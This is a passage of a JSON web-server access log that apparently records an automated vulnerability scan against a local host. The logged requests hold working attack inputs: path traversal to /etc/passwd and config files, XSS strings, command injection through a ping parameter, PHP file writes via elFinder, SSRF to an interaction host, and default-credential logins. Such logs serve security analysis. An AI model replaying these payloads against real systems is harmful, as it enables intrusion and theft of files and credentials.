HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.353","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:39 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"-","request":"GET /css/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.001","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:39 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /admin/index.php?p=ajax-ops&op=elfinder&cmd=mkfile&name=28fHqU8pZ0GZG1ybBeIoaUNd9u7.php&target=l1_Lw HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.339","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:39 +0000","request_body":"id=%3Chtml%3E%3Cimg+src+onerror%3Dalert%28%60document.domain%60%29%3E","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /wp-admin/admin-ajax.php?action=wprss_fetch_items_row_action HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.393","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:39 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /api/api-docs/swagger.yaml HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.334","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:39 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /_.htaccess HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.270","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:39 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../opt/zimbra/conf/localconfig.xml%00 HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.456","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:39 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_perchacategoriestree&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.351","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:39 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /php.php HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.295","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:39 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/etc/passwd HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.387","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:39 +0000","request_body":"html_response_page=login_pic.asp&action=ping_test&ping_ipaddr=127.0.0.1%0atype+C%3A%5CWindows%5Cwin.ini","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /apply_sec.cgi HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"1.179","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"http://127.0.0.1/login_pic.asp", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:39 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /src/read_body.php?mailbox=/etc/passwd&passed_id=1& HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.274","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:39 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /?wsdl HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.297","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:39 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /manager/html HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"1.421","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:39 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.330","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:39 +0000","request_body":"cmd=put&target={{hash}}&content=%3c%3fphp%20echo%20%2228fHqTSXbZ65GSfSllxIRHaqRPx%22%3b%20%3f%3e","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /admin/index.php?p=ajax-ops&op=elfinder HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.295","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:39 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /sample.htaccess HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.320","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:39 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /api/get_device_details HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"1.410","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"http://127.0.0.1/assets/base/home.html", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:39 +0000","request_body":"vfb-content=entries&format=csv&entries_form_id=1&entries_start_date=0&entries_end_date=0&submit=Download+Export+File","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /wp-admin/admin.php?page=vfb-export HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.388","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"http://127.0.0.1/wp-admin/admin.php?page=vfb-export", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:39 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.296","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:39 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /phpinfo.php HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.273","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:39 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/emag-marketplace-connector/templates/order/awb-meta-box.php?post=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.276","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:39 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /.gitignore HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.245","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:39 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /docker-compose.staging.yml HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"1.314","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:39 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /debug.seam HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.271","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:39 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /pureweb/server/login.jsp HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.263","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:40 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /SupportPortlet/faces/javax.faces.resource/web.xml?loc=../WEB-INF HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.723","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:40 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /src/download.php?absolute_dl=true&passed_id=1&passed_ent_id=1&mailbox=/etc/passwd HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.373","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:40 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /manager/html HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.338","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:40 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.358","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:40 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /product-downloads/28fHqU8pZ0GZG1ybBeIoaUNd9u7.php HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.342","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:40 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /info.php HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.273","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:40 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /login.aspx HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.274","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:40 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /assets/.gitignore HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.312","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:40 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /updating.jsp?url=https://example.com/ HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.336","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:40 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /portal/portalhelp/en/ HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.338","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:40 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /a.htaccess HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.354","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:40 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/admin-font-editor/css.php?size=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.295","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:40 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /SupportPortlet/faces/javax.faces.resource./WEB-INF/web.xml.jsf?ln=.. HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.351","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:40 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET //example.com/%2f.. HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.295","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:40 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /plugins/servlet/oauth/users/icon-uri?consumerUri=http://c9oms3gsmpve1ijt0mc0r7x11wneq6kis.oast.live HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.249","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:40 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /graphiql.php HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"1.377","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:40 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/marmoset-viewer/mviewer.php?id=http:// HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"2.482","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:40 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /infophp.php HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.338","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:40 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /admin.php HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"1.444","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:40 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /7/0/33/1d/www.citysearch.com/search?what=x&where=place%22%3E%3Csvg+onload=confirm(document.domain)%3E HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.390","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:40 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /htaccess_for_page_not_found_redirects.htaccess HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.379","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:40 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /includes/.gitignore HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.387","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:40 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /debug/default/view.html HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.386","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:40 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /cgi-bin/tsaupload.cgi?file_name=../../../../../..//etc/passwd&password= HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"2.556","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:40 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.395","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:40 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/simpel-reserveren/edit.php?page=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.338","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:40 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /graphiql/finland HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.342","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:40 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/marmoset-viewer/mviewer.php?id=1+http://a.com%27);alert(/28fHqYXutQUG6Pd782hBCDqZL34/);marmoset.embed(%27a HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.374","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:40 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /php_info.php HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.373","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:40 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /zdm/login_xdm_uc.jsp HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.389","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:40 +0000","request_body":"_charset_=utf-8&j_username=aparker@geometrixx.info&j_password=aparker&j_validate=true","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /libs/granite/core/content/login.html/j_security_check HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"2.517","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"http://127.0.0.1/libs/granite/core/content/login.html", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:40 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /favicon.ico HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.338","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:40 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /favicon.ico HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.771","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:40 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /maint/modules/endpointcfg/endpointcfg.php?lang=../../../../../../../../etc/passwd%00 HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"1.848","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:40 +0000","request_body":"Password=28fHqYrqmzkv9m0pJ4eO0ios09B&ConfirmPassword=28fHqYrqmzkv9m0pJ4eO0ios09B&RememberMe=true&__RequestVerificationToken={{csrf}}&RememberMe=false","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /account/register 